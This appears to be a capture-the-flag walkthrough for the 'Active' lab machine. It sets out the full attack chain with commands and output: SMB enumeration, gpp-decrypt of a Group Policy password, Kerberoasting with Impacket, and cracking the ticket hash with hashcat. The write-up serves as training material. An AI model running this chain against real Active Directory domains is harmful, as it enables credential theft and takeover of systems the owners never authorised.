Overview

This machine is very easy in getting the root flag once you know how to use the requisite AD enumeration tools. You will also need to know about gpp-decrypt as a tool, since you find an reversibly-encrypted password in a group policy file. The Impacket suite are the tools to use one you have any level of user credentials.

Initial Scan

sudo nmap -Pn -p- -A 10.10.10.100
[sudo] password for kali: 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-19 16:48 EDT
Nmap scan report for 10.10.10.100
Host is up (0.047s latency).
Not shown: 65512 closed tcp ports (reset)
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-09-19 20:51:59Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5722/tcp  open  msrpc         Microsoft Windows RPC
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49152/tcp open  msrpc         Microsoft Windows RPC
49153/tcp open  msrpc         Microsoft Windows RPC
49154/tcp open  msrpc         Microsoft Windows RPC
49155/tcp open  msrpc         Microsoft Windows RPC
49157/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         Microsoft Windows RPC
49165/tcp open  msrpc         Microsoft Windows RPC
49166/tcp open  msrpc         Microsoft Windows RPC
49173/tcp open  msrpc         Microsoft Windows RPC
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=9/19%OT=53%CT=1%CU=33837%PV=Y%DS=2%DC=T%G=Y%TM=66EC
OS:8F3E%P=x86_64-pc-linux-gnu)SEQ(SP=102%GCD=1%ISR=10A%TI=I%II=I%SS=S%TS=7)
OS:SEQ(SP=102%GCD=1%ISR=10A%TI=I%CI=I%II=I%SS=S%TS=7)SEQ(SP=102%GCD=1%ISR=1
OS:0A%TI=I%CI=RD%II=I%SS=S%TS=7)OPS(O1=M53CNW8ST11%O2=M53CNW8ST11%O3=M53CNW
OS:8NNT11%O4=M53CNW8ST11%O5=M53CNW8ST11%O6=M53CST11)WIN(W1=2000%W2=2000%W3=
OS:2000%W4=2000%W5=2000%W6=2000)ECN(R=Y%DF=Y%T=80%W=2000%O=M53CNW8NNS%CC=N%
OS:Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F
OS:=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T=80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%
OS:T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=O%A=O%F=R%O=%RD=0
OS:%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=
OS:Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T6(R=
OS:Y%DF=Y%T=80%W=0%S=O%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=O%F=AR
OS:%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=
OS:80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=80%CD=Z
OS:)

Network Distance: 2 hops
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2024-09-19T20:53:09
|_  start_date: 2024-09-19T20:46:08
|_clock-skew: -3s
| smb2-security-mode: 
|   2:1:0: 
|_    Message signing enabled and required

TRACEROUTE (using port 5900/tcp)
HOP RTT      ADDRESS
1   45.45 ms 10.10.14.1
2   45.60 ms 10.10.10.100

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 273.90 seconds

Enumeration

SMB

smbclient -N -L 10.10.10.100     
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        Replication     Disk      
        SYSVOL          Disk      Logon server share 
        Users           Disk      
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.100 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

smbclient -N \\\\10.10.10.100\\Replication

Find a Groups.xml file with a user, SVC_TGS

gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
GPPstillStandingStrong2k18

This account can access the Users share found previously

smbclient -U SVC_TGS%GPPstillStandingStrong2k18 //10.10.10.100/Users

This lets us get the first flag.

GetADUsers.py -all active.htb/svc_tgs -dc-ip 10.10.10.100
/usr/share/offsec-awae-wheels/pyOpenSSL-19.1.0-py2.py3-none-any.whl/OpenSSL/crypto.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.
Impacket v0.9.19 - Copyright 2019 SecureAuth Corporation

Password:
[*] Querying 10.10.10.100 for information about domain.
Name                  Email                           PasswordLastSet      LastLogon           
--------------------  ------------------------------  -------------------  -------------------
Administrator                                         2018-07-18 15:06:40  2024-09-19 17:40:13 
Guest                                                 <never>              <never>             
krbtgt                                                2018-07-18 14:50:36  <never>             
SVC_TGS                                               2018-07-18 16:14:38  2018-07-21 10:01:30

Shows only the Administrator and SVC_TGS accounts are active.

sudo GetUserSPNs.py active.htb/svc_tgs:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100
/usr/share/offsec-awae-wheels/pyOpenSSL-19.1.0-py2.py3-none-any.whl/OpenSSL/crypto.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.
Impacket v0.9.19 - Copyright 2019 SecureAuth Corporation

ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet      LastLogon           
--------------------  -------------  --------------------------------------------------------  -------------------  -------------------
active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-18 15:06:40  2024-09-19 17:40:13

sudo GetUserSPNs.py active.htb/svc_tgs:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100 -request
/usr/share/offsec-awae-wheels/pyOpenSSL-19.1.0-py2.py3-none-any.whl/OpenSSL/crypto.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.
Impacket v0.9.19 - Copyright 2019 SecureAuth Corporation

ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet      LastLogon           
--------------------  -------------  --------------------------------------------------------  -------------------  -------------------
active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-18 15:06:40  2024-09-19 17:40:13 



$krb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS~445*$b39c70d7d118491f498dfcc28d071d5c$9ed162d5ad23292fa984508801a508cb0ebe831910c08f88d094e351328c0baa3907b5a3e82b866839b51a2f2919dfd6d4739202bc8849e6a6a135e745313a418e32ea0da3c5f2002bb7538a25e5fb6f83003e1b9385381931d873ca4dc25ffe7bd1306093d5782f7fa0028467d9daeb8373e6c8fa8d28ce66fbba3537e980c6e6ced04a78fe9ea0f315ec0662c3d4d84be37554a57b36a92be7d38dec922f1fa431bb8ff313f5ca3245e5e135a4d8790119c7cb68b72853019c976e38214b1640f8a8afe95b7511556ec58227fe2a4698cff04a0e473df3d83b2f3e3b2d9ecf3fc35a7af7330ce78765b601bd79ea3a64d307905246f06353413d57c1e9dd9a507a494f9c11e54175fed94cd750fd06fbc230fda44de06db830809b5eb58391bd8ff78b01468b94359006c4d6558a5ca2977310a40a2efb250c36638f206e08ac2c72fc6a1d0286d415098931fa3856347ebc9cfbda7f1ebaadde03b12f678a5b23306b27dab020fc03c35c859810b703aac9826c8dc1540c11357e7d1ce56454a69e39ef69966d5c2579fd36233f2671fa79398163b2a8f268094893ce194fc043edd12a5b872d65b0bfe7bf8802b1eb67ab27d7cc19ad4393ee1da7f545b0816b9b39e5f83993e73c5ac3c16ee379e7025822d6534b5384ea170282e6371416776dd27bf478b2573e69320973bb5c7de9ef7e9c1fd8683e5a4bcb08d48b30b0bab4fd9ddbd083f4b99af6469c260f5ee32557a8210deb5461495a3bf25f9fb2b28ca16ab72d25dca50e5c0aa6804a46de528c89b24d72e83808cab79a57f561fd649a7b6a6c0552a165951dcbdebaadc3cbb6b639ee8a1c7a272d9457aaa08894f04017e7a53b5f2f08824c8959e438de15fd77a7a2fd67d512818382baedf22f0cb42607fd52ed30accf3b2354f7c65a8fe77bde724b74e643cec5149d3d7e24658c8f89bcff62e40c129dcc36e946c54a607b6fe44a5be1401c1f192c1a605bb69b014264a27de8f65eb898a3e6aa7f8b357b7ab5ca75d9d95d60bdb18f5e5933e2a6ec4474af9917584476bb2869c34593f7e637f3513256d98dbd5cdf3c549dd44cf6c0da0c8d3003786c6ff786cd8423e3a6d82ce60193455d541a2a5ad426df04d1bd75bd9dce9e1c4d9e4ef7bb7e1a9c1dae882e089cc24a681cc1bac282cfae8723e2d2779df097d088d6151496bedf2b5d32453228d294872c02756faa57c61abcd9665fcf4582962bbac9edb6dc9fd300732950

hashcat -m 13100 admin-hash.txt /usr/share/wordlists/rockyou.txt

This cracks the password to Ticketmaster1968

Once this is done, we can use smbclient again to get the flag

smbclient -U SVC_TGS%GPPstillStandingStrong2k18 //10.10.10.100/Users

Drew's Cyber Ops

Explorer

Active

Overview

Initial Scan

Enumeration

SMB

Graph View

Table of Contents

Backlinks